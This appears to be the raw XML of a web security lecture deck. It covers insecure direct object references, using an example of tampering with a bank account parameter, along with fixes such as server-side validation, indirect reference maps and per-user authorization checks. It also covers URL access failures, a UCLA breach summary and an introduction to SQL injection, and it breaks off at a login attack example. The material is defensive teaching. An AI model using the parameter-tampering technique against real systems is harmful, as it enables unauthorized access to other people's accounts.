          <p:cNvPr id="581635" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{853D439A-4CA0-DA42-C067-65B4F7CBF3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670203" y="1754536"/>
            <a:ext cx="6851593" cy="4951347"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{469E23FE-2C35-B130-59BE-5961FA0414D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Insecure Direct Object Reference</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="652291" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B3F25E6-B403-5BFA-7A03-DBE8780B6B42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, database record, or key, as a URL or form parameter. Attackers can manipulate those references to access other objects </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>without authorization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>.”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Fancy term for parameter tampering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Involves modifying parameters to access unauthorized materials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>E.g. /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>BankAccount.jsp?acct_nmbr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>=123</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>The hacker modifies the parameter to view another users account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709CB647-B3B4-9FB0-5774-0A5B0F672825}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Solution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="654339" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C6CB9D5-3FCE-FBBA-912E-96A086C2771E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>Properly validate data!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>Cookie data, URL parameters, all HTML Form data (even hidden, select, radio and checkbox types)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>Restricting length of HTML text boxes, options in select boxes, and JavaScript validation can all be easily sidestepped and are not secure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>All input data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200" b="1" u="sng" dirty="0"/>
              <a:t>MUST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200" dirty="0"/>
              <a:t> be validated server side for each request – client side validation is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200" b="1" u="sng" dirty="0"/>
              <a:t>EASILY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200" dirty="0"/>
              <a:t> bypassed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>Do not expose internals to the user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>Such as IDs (if possible/necessary)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>Use an indirect reference map with hard to guess keys (hash)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>POST /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200" dirty="0" err="1"/>
              <a:t>BankAccount.jsp?acct_nmbr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>=d83OJdm3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>The server then uses the key to get the real value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>Key: d83OJdm3 value: 123</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US"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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5A851B3-1DD8-D65F-5089-43A7878302DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Input forms</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="910339" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{639377A2-CF98-513E-2E9B-8136AB8F2B8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1"/>
              <a:t>Forms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t> let users pass parameters to the web server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Parameters are passed using GET or POST requests.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1"/>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>: parameters are contained in the request URL.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>	http://www.google.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1"/>
              <a:t>?q=Stephen+Colbert&amp;lang=en</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="900"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1"/>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>: parameters are contained in the HTTP packet header.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>harder for the user to see, but no more secure than GET</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Forms provide a rich attack ground...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="910340" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A05A44A2-5B0B-C340-9CC9-65DABB2FE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110" b="10811"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8647201" y="2388066"/>
            <a:ext cx="258286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id="{16E3D19F-A56D-884B-1621-38315854FD2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Use Proper Authorization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="655363" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B777B2CF-5DC5-037D-43F7-81A01E3BC471}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Check authorization with every request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Back to the bank example</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Before: select * from accounts where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>account_number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> = ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>After: select * from accounts where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>account_number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> = ? and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> =?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" alt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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54E44D22-BA1A-CC19-296B-AF42BE32346B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Failure to Restrict URL Access</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="766979" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFFBB89A-F398-6AD1-4465-A5E066927682}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>“Frequently, an application only protects sensitive functionality by preventing the display of links or URLs to unauthorized users. Attackers can use this weakness to access and perform unauthorized operations by accessing those URLs directly. “</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Can be caused by:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Improper authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Incorrect authorization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Unprotected admin areas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Usually caused by easy to guess URLs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093BC5AB-EE5F-551D-2A46-DE05C459E3F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>UCLA Security Incident</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="586755" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84390B43-0D51-D1B7-2908-EF42C579D729}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>30,000 people affected directly; 800,000 notifications sent out 12/2006</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>Unsupported/forgotten legacy web application was targeted with escalated database privileges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>Web application vulnerability exposed data online using SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>Hacked server was then used to gain access to more sensitive servers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3FD43E68-19BC-441E-C355-7F3233F7D084}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Impact of SQL Injection - Dangerous</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="587779" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7D36EB3-E0D8-6481-A793-E5B747C19A53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>At best: you can leak information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>Depending on your configuration, a hacker can</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>Delete, alter or create data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>Grant access to the hacker silently</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>Escalate privileges and even take over the OS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="28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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCC1E579-EFFC-C563-2860-35AD3DC3739E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>SQL Injection Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Content Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8215E602-EAE6-3255-8975-46ABDAC8E2F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“SQL injection is a security vulnerability that occurs in the database layer of an application. Its source is the incorrect escaping of dynamically-generated string literals embedded in SQL statements. “ (Wikipedia)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="732163" name="Text Box 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAD6AFDB-B171-599E-5140-730A22956635}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3184526" y="1562101"/>
            <a:ext cx="6721475"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0">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altLang="en-US">
              <a:latin typeface="Times New Roman" panose="020206030504050203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27497B32-CFD0-472F-486A-5934F7DB80E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>SQL Injection Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="589827" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBF258A5-FDA9-5134-D7E6-A68E0948A567}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>Login Example Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Text in blue is your SQL code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
